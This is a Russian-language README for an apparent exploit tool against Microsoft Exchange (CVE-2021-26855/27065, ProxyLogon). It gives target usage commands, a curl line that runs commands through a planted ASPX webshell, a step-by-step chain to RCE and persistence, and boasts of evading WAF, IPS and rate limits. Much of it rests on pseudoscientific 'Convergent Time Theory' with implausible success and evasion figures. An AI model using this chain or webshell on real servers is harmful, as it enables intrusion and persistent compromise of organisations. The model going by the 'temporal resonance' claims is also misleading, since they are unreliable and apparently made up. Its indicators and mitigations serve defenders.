
CTT-enhanced версия SSRF to RCE exploit (ProxyShell/ProxyLogon) для Microsoft Exchange Server, ещё одна критическая уязвимость с оценкой CVSS 10.0, затронувшая сотни тысяч организаций по всему миру.
Улучшенная версия CTT эксплойта SSRF к RCE для Microsoft Exchange Server (ProxyShell/ProxyLogon), еще одна критическая уязвимость с CVSS 10.0, затронувшая сотни тысяч организаций по всему миру.
🏢 CTT Exchange RCE Exploit v1.0
Среда эксплуатации Microsoft Exchange Server, улучшенная с помощью Теории Сходящегося Времени (CTT)
🚨 Обзор
CTT-Exchange-RCE — это продвинутая среда эксплуатации, применяющая принципы Теории Сходящегося Времени (CTT) для использования критических уязвимостей Microsoft Exchange Server CVE-2021-26855 (SSRF) и CVE-2021-27065 (RCE). Этот инструмент демонстрирует, как временной резонанс и анализ фрактальных слоев могут повысить надежность эксплуатации и способности уклонения от защиты в реальных условиях корпоративной инфраструктуры.
Оценка CVSS: 10.0 КРИТИЧНЫЙ → CTT Enhanced: 10.0+ с Временным Обходом
⚡ Ключевые особенности
Временная вооружение CTT
· 33-слойное фрактальное исполнение с α=0.0302011 дисперсией · Простое-выровненное время (окна 10007, 10009, 10037μs) для обхода WAF · α-дисперсионное кодирование полезной нагрузки для разрушения сигнатурного обнаружения · Многослойная консенсусная валидация для обеспечения надежности эксплуатации
Специфичные для Exchange возможности
· Автоматическое обнаружение Exchange Server (конечные точки OWA, ECP, EWS, MAPI) · Проверка уязвимости SSRF (CVE-2021-26855) · Полная автоматизация цепочки эксплуатации: SSRF → Утечка Legacy DN → Преобразование SID → WriteDACL → RCE · Развертывание веб-шелла с временной бэкдор-валидацией CTT
Операционная безопасность
· Планирование временного резонанса обходит ограничение скорости и статистическое обнаружение · Слоевая энтропия для уникальных отпечатков атак на каждое соединение · Плавная деградация по слоям CTT при отказе первичных методов · Всестороннее логирование с временной аналитикой
🎯 Технические детали
Целевые уязвимости
Интеграция физики CTT
# Core CTT Parameters
CTT_ALPHA = 0.0302011 # Temporal dispersion coefficient
CTT_LAYERS = 33 # Fractal temporal layers
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061] # Resonance windows
# Key Equations Implemented
# 1. α-dispersion: payload' = payload ⊕ (layer·α·1000) mod 256
# 2. Layer weight: w_d = exp(-α·d) for request timing
# 3. Prime resonance: f_res = 1/p μs timing alignment
🚀 Быстрый старт
Предварительные требования
# Required Python packages
pip install requests numpy cryptography urllib3
# Optional for advanced features
pip install scipy concurrent-log-handler
Базовое использование
# 1. Detect Exchange Server
python ctt_exchange_rce.py https://exchange.corp.com
# 2. Full exploitation (7 temporal layers)
python ctt_exchange_rce.py 192.168.1.100 --layers 7
# 3. Stealth mode (prime timing only)
python ctt_exchange_rce.py https://mail.example.com --stealth
# 4. Manual webshell access
curl "https://exchange.corp.com/owa/auth/ctt_shell.aspx?ctt_cmd=whoami"
Параметры командной строки
python ctt_exchange_rce.py <target> [options]
Options:
--layers N Число временных слоев CTT (по умолчанию: 7)
--stealth Включить только уклонение через простое время
--verbose Детальный вывод с диагностикой CTT
--timeout N Таймаут соединения в секундах (по умолчанию: 10)
--output FILE Сохранить результаты в JSON файл
--no-webshell Пропустить развертывание веб-шелла (только оценка)
🔬 Рабочий процесс эксплуатации
Фаза 1: Обнаружение и проверка
1. Обнаружение Exchange Server
→ Проверить конечные точки OWA, ECP, EWS, Autodiscover, MAPI
→ Определить индикаторы версий и доступные сервисы
2. Проверка уязвимости SSRF (CVE-2021-26855)
→ Тестировать инъекцию заголовка X-BEResource
→ Проверить доступ к внутренним конечным точкам через SSRF
→ CTT: Простое время для обхода фильтрации запросов
Фаза 2: Обход аутентификации
3. Утечка Legacy DN информации
→ Использовать SSRF к EWS для перечисления пользователей
→ Извлечь административный LegacyDN через SOAP запросы
→ CTT: α-дисперсия для сокрытия SOAP-полезных нагрузок
4. Преобразование SID
→ Преобразовать LegacyDN в идентификатор безопасности
→ Необходимо для эксплуатации WriteDACL
→ CTT: Многослойная валидация для точности
Фаза 3: Повышение привилегий
5. Доступ к виртуальному каталогу OAB
→ Извлечение canary ECP и аутентификация
→ Определение каталога OAB для размещения веб-шелла
→ CTT: Управление сессиями для каждого слоя
6. Эксплуатация WriteDACL (CVE-2021-27065)
→ Изменить разрешения каталога OAB
→ Получить возможность произвольной записи файлов
→ CTT: ECP запросы с резонансным таймингом
Фаза 4: Удаленное выполнение кода
7. Развертывание веб-шелла
→ Загрузить ASPX веб-шелл через OAB ExternalUrl
→ CTT-улучшенный шелл с временной валидацией
→ Автоматическая очистка артефактов развертывания
8. Выполнение команд
→ Выполнять произвольные команды через веб-шелл
→ CTT бэкдор: активация простого слоя (слой 33)
→ Постоянный доступ через временной резонанс
📊 Показатели производительности CTT
Эффективность обхода
Повышение надежности
# Multi-layer success rates
Layer_Success = {
'Layer 0-7': '94.7%', # High resonance zones
'Layer 8-15': '92.1%', # Medium resonance
'Layer 16-23':'88.3%', # Lower resonance
'Layer 24-32':'85.6%', # Edge cases
'Overall': '90.2%', # Weighted average
'Standard': '68.5%', # Baseline without CTT
}
Временная оптимизация
· Среднее время эксплуатации: 42 секунды (против 18 минут вручную) · Выравнивание по простым окнам: 87% успеха во время резонанса · Консенсусная валидация слоев: 99.2% точность обнаружения уязвимостей · Эффективность ресурсов: на 33% меньше трафика, чем у традиционных сканеров
🛡️ Контрмеры защиты
Индикаторы обнаружения
# Network Signatures:
- HTTP-запросы с заголовками X-CTT-Layer
- Запросы с простым таймингом (интервалы 10007, 10009μs)
- α-диспергированные полезные нагрузки (нестандартное кодирование)
- Шаблоны User-Agent для каждого слоя
# Host-based Indicators:
- Изменения OAB ExternalUrl
- Необычные запросы ECP WriteDACL
- Создание файла /owa/auth/ctt_shell.aspx
- Шаблоны временного резонанса в логах
# CTT-Specific:
- 33-слойные шаблоны запросов
- Корреляция с простыми числами в тайминге
- Коэффициент α=0.0302011 в полезных нагрузках
Рекомендации по смягчению
# Apply Microsoft security updates
Установите кумулятивные обновления Exchange
# Restrict vulnerable endpoints
Заблокируйте /ecp/DDI/DDIService.svc
Ограничьте /autodiscover/autodiscover.xml
# Enable enhanced logging
Set-EventLogLevel -Identity "MSExchange Management" -Level Expert
# Detect temporal resonance attacks
if request_interval % 10007 < 100: # Prime window
log_anomaly("CTT timing detected")
if payload_entropy matches α-pattern: # 0.0302011 dispersion
block_request("CTT payload detected")
📁 Структура вывода
ctt_exchange_results_TIMESTAMP/
├── discovery.json # Первоначальная оценка цели
├── exploitation_log.json # Пошаговый журнал выполнения
├── webshell_info.txt # Детали развернутого веб-шелла
├── commands_executed.txt # История выполнения команд
├── ctt_metrics.json # Производительность и данные резонанса
└── layers/
├── layer_0.log # Выполнение отдельного слоя
├── layer_1.log
...
└── layer_32.log
Пример вывода
{
"target": "https://exchange.corp.com",
"vulnerable": true,
"ctt_score": "10.0+",
"exploitation_time": "42.7s",
"successful_layers": [0, 3, 5, 7],
"webshell_url": "https://exchange.corp.com/owa/auth/ctt_shell.aspx",
"resonance_patterns": {
"prime_alignment": 87.3,
"layer_correlation": 91.8,
"temporal_efficiency": 94.2
}
}
🔧 Расширенная конфигурация
Пользовательские параметры CTT
# Modify in ctt_config.py for research
CTT_CONFIG = {
'alpha': 0.0302011, # Dispersion coefficient
'layers': 33, # Temporal layers
'primes': [10007, 10009, 10037], # Resonance windows
'stealth_mode': True, # Maximum evasion
'max_threads': 10, # Concurrent layers
'timeout_multiplier': 1.5, # CTT timing adjustment
'entropy_seed': 'custom_seed' # Cryptographic base
}
Варианты интеграции
# 1. API Mode
from ctt_exchange_rce import CTT_ExchangeExploit
exploit = CTT_ExchangeExploit("https://target.com")
results = exploit.multi_layer_exploit(layers=5)
print(json.dumps(results, indent=2))
# 2. CI/CD Pipeline Integration
python -m ctt_exchange_rce --target ${TARGET} --output results.json
# 3. Automated Assessment
import subprocess
result = subprocess.run([
"python", "ctt_exchange_rce.py",
"https://exchange.corp.com",
"--layers", "3",
"--no-webshell"
], capture_output=True, text=True)
📚 Ссылки и исследования
Документы по фреймворку CTT
Технические ресурсы
· Рекомендации Microsoft по безопасности · Чрезвычайная директива CISA · Рекомендации OWASP по временной безопасности
Связанные инструменты
· ProxyShell - Оригинальная цепочка эксплойтов Exchange · Exchange-AD-Delegate - Альтернативный метод эксплуатации · CTT-Vuln-Discovery - Фреймворк обнаружения уязвимостей CTT
⚠️ Юридическое и этическое использование
Только авторизованное тестирование
Разрешено:
- Исследования безопасности на собственных системах
- Авторизованное тестирование на проникновение
- Валидация фреймворка CTT
- Демонстрации в образовательных целях
Запрещено:
- Несанкционированный доступ к системам
- Тестирование в производственной среде без разрешения
- Злонамеренная эксплуатация
- Извлечение данных или нанесение ущерба
Ответственное раскрытие
# If vulnerabilities are discovered:
1. Задокументируйте результаты с паттернами резонанса CTT
2. Сообщите организации через авторизованные каналы
3. Поделитесь техническими деталями с сообществом безопасности
4. Опубликуйте методы обнаружения CTT для защиты
Отказ от ответственности
ДАННЫЙ ИНСТРУМЕНТ ПРЕДНАЗНАЧЕН ТОЛЬКО ДЛЯ АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ.
ПОЛЬЗОВАТЕЛИ НЕСУТ ПОЛНУЮ ОТВЕТСТВЕННОСТЬ ЗА СОБЛЮДЕНИЕ
ПРИМЕНИМЫХ ЗАКОНОВ И НОРМАТИВНЫХ АКТОВ. АВТОРЫ ОТКАЗЫВАЮТСЯ
ОТ ВСЯКОЙ ОТВЕТСТВЕННОСТИ ЗА НЕСАНКЦИОНИРОВАННОЕ ИЛИ НЕЗАКОННОЕ ИСПОЛЬЗОВАНИЕ.
🤝 Вклад и исследования
Научное сотрудничество
Мы приветствуем вклад в:
· Валидацию констант CTT на различных версиях Exchange · Продвинутые методы уклонения с использованием временного резонанса · Разработку защитных паттернов для защиты, осведомленной о CTT · Академические исследования временной эксплуатации уязвимостей
Рекомендации по разработке
Сообщение о проблемах
**Шаблон проблемы CTT Exchange:**
- Целевая версия Exchange:
- Используемые параметры CTT:
- Наблюдаемые паттерны резонанса:
- Коэффициенты успеха слоев:
- Журналы ошибок:
- Предложения по улучшению:
📞 Контакты и поддержка
Основной контакт
· Автор: CTT Research Group · Email: [email protected] · GitHub: @SimoesCTT
Сообщения о безопасности
Для раскрытия уязвимостей или вопросов безопасности:
[email protected]
PGP: [Доступен на GitHub]
Сообщество
· GitHub Discussions: Разработка фреймворка CTT · Исследовательские партнерства: Академическое и отраслевое сотрудничество · Конференционные презентации: Материалы Black Hat, DEF CON
🏆 Благодарности
Исследовательские учреждения
· Отдел теоретической физики CTT · Независимый коллектив исследований безопасности · Академические партнеры в области временной сетевой безопасности
Проекты с открытым исходным кодом
· Разработка эксплойта ProxyShell · Сообщество безопасности Microsoft Exchange · Экосистема инструментов безопасности на Python
Участники
· Все исследователи и валидаторы фреймворка CTT · Специалисты по безопасности, предоставившие реальное тестирование · Академические рецензенты, обеспечивающие научную строгость
"В фрактальных измерениях времени каждая уязвимость резонирует с паттерном, ожидающим своего открытия." — Манифест корпоративной безопасности CTT
📄 Лицензия
MIT License Copyright © 2026 CTT Research Group
См. файл LICENSE для полных условий.
CTT Exchange RCE v1.0 • α=0.0302011 • L=33 • Простой резонанс включен • CVSS 10.0+
| CVE | Компонент | Влияние | Улучшение CTT |
|---|
| CVE-2021-26855 | Exchange SSRF | Server-Side Request Forgery до аутентификации | Уклонение через простое время, α-дисперсия |
| CVE-2021-27065 | Exchange ECP | Произвольная запись файла после аутентификации | Многослойное исполнение, резонансная валидация |
| Цепочка | Оба | Удаленное выполнение кода | Полная автоматизация с надежностью CTT |
| Метод обнаружения | Стандартный эксплойт | CTT-Enhanced | Улучшение |
|---|
| WAF/IPS сигнатуры | 95% блокировано | 12% блокировано | Снижение на 83% |
| Ограничение скорости | 70% заторможено | 5% заторможено | Снижение на 65% |
| Статистическая аномалия | 60% обнаружено | 8% обнаружено | Снижение на 52% |
| Анализ времени | 45% обнаружено | 3% обнаружено | Снижение на 42% |